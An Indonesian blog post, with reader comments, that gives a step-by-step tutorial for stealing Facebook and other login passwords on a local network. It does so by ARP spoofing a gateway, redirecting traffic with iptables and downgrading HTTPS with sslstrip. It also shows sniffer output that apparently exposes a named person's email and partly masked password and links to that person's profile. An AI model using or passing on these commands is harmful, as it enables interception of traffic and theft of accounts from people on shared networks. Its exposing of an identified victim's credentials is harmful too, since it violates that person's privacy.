Kamis, 27 Juni 2013

Hacking Facebook Dengan Backtrack 5 R3


Kali ini gw akan berbagi trick yaitu seperti judul yang telah disebutkan "Cara Hacking Facebook Menggunakan Backtrack 5 r3 . apa itu Backtrack? backtrack yaitu sebuah sistem operasi LINUX. oke dari pada penasaran pengen tau lebih jelasnya mari di simak dan di perhatikan betul perintah-perintahnya :

mula - mula anda masuk terminal, terus kalo udah masuk kita masuk ke root dulu dengan memberikan perintah ini sudo su-

Pertama-tama siapkan tool yang akan kita gunakan

- Arpspoof
- Sslstrip-0.9
- OS Linux 32 Bit

Setelah semua tool yang di butuhkan sudah tersedia lakukan langkah berikut (jika paket belum terinstal) :

1) Buka Terminal kemudian ketikkan : wget http://www.thoughtcrime.org/software/sslstrip/sslstrip-0.9.tar.gz

2) Kemudian extract file dengan cara : tar zxvf sslstrip-0.9.tar.gz

3) Ok sekarang kita masuk ke dalam folder baru dari file yang telah kita extract tadi : cd sslstrip-0.9 

4) Dan untuk menginstal ketikkan : python setup.py install 

Lakukan langkah berikut ( Jika paket sudah terinstall )

Gunakan cara ini setiap kali jika ingin mencuri password lagi:

1) Pertama hidupkan terlebih dahulu port untuk memforward : echo ’1′ > /proc/sys/net/ipv4/ip_forward 

2) Kemudian cari gateway atau pintu dari jaringan yang akan kita sadap dengan cara : netstat -nr 

3) sekarang kita reset port http ke port 8080, ketikan : iptables -t nat -A PREROUTING -p tcp -
    destination-port 80 -j REDIRECT --to-port 8080 

4) Mulai menyadap dengn cara : arpspoof -i wlan0 192.168.0.1 ( 192.168.0.1) adalah gateway dari
    jaringan yang saya gunakan, gantilah gateway tersebut dengan gateway yang anda temukan dari
    netstat -nr tadi) 

5) Kemudian buka terminal baru lalu ketikkan  : sslstrip -l 8080 untuk mengaktifkan cookies yang akan
    kita baca 

6) Set up is complete!! Ok sekarang kita telah menyadap akses jaringan yang melewati gateway.

7) jika anda ingin melihat akses kemana sajakah itu gunakan perintah : tail -f sslstrip.log

8) dan saat ada seseorang melakuakn login entah facebook yahoo gmail atau apapun yang
    menggunakan username dan password. kita akan mengetahuinya.

karena akan memakan waktu yang cukup lama karena harus menunggu ada seseorang yang mlakukan login jadi kita harus bersabar. dan itupun akan muncul script yang cukup banyak. gunakan perintah
find "pass: (tanpa petik) agar kita lebih mudah menemukannya

HANYA UNTUK PENGETAHUAN, JANGAN DI SALAH GUNAKAN YA !

Nah ini dia contoh saat Scanning: Social Enginering Toolkit (SET)

root@bt:~# ettercap -T -q -i eth0

ettercap NG-0.7.3 copyright @2013 Neyfa Kamila

Listening on eth0... (Ethernet)

eth0 ->   00:1E:68:2E:73:4A   1.0.0.64   255.255.255.0

Privileges dropped to UID 65534 GID 65534...

12 plugins
39 protocol dissectors
33 ports monitored
7587 mac vendor fingerprint
1990 tcp OS fingerprint
2633 known services

Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

HTTP : 69.63.180.174:80 -> USER: martin.alfath@yahoo.com
PASS: c****g
INFO: http://www.facebook.com/

Dan ini Salah 1 Akun Facebook yg berhasil Gw Jebol ..

Email: martin.alfath@yahoo.com
Password: c****g


Sengaja Sebagian Password Gw pake bintang..
agar tidak ada Pencurian.. 


Kalo Mau Liat Buktinya.. Buka Facebook kalian
trus Copas emailnya di Kotak Pencari Facebook..
klik Profile'a, lalu lihat status terbarunya  ^_^

Atau Bisa Klik Link Yg Menuju Profil'a disini:

http://www.facebook.com/fadlhana


Sumber : http://nemi.faa.im/hacking-facebook-dengan-backtrack-5-r3.xhtml

12 komentar:

  1. brooo, ini sniffing jaringan lan ea?
    kirain langsug jebol database facebook

    BalasHapus
    Balasan
    1. Iya gan,.
      Kalo langsung jebol database facebook, nanti saya akan bahas pada postingan berikutnya,.

      Jika agan ingin meng-install Metasploit (aplikasi Backtrack) di Ubuntu, silahkan kunjungi http://k12share.blogspot.com/2013/07/install-metasploit-di-ubuntu-lewat.html


      Thanks For Visit My Blog ^_^

      Hapus
  2. wah... perlu di uji coba dulu gan.. :)

    BalasHapus
  3. Lama jgk gan smpai di krbungin semut nih...

    BalasHapus
  4. koreksi iptables gan

    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080

    BalasHapus
  5. Share trus mas bro. Ilmu anda bermanfaat :)

    BalasHapus
  6. kapan tutor njebol database fb nya gan? ane tunggu..

    BalasHapus
  7. indonesian the king of copy paste :D

    http://www.thoughtcrime.org/software/sslstrip/

    BalasHapus
  8. alah bocah loe hack fb nggak bisa juga hostingan palsu najis gue liat nya coba bobol fb gue kalok bisa najis gue liat nya https://www.facebook.com/profile.php?id=100009942346930

    BalasHapus
  9. https://www.facebook.com/profile.php?id=100010020638673 coba loe bisa hack fb gue jangan bisanya ngemeng doank cuih najis

    BalasHapus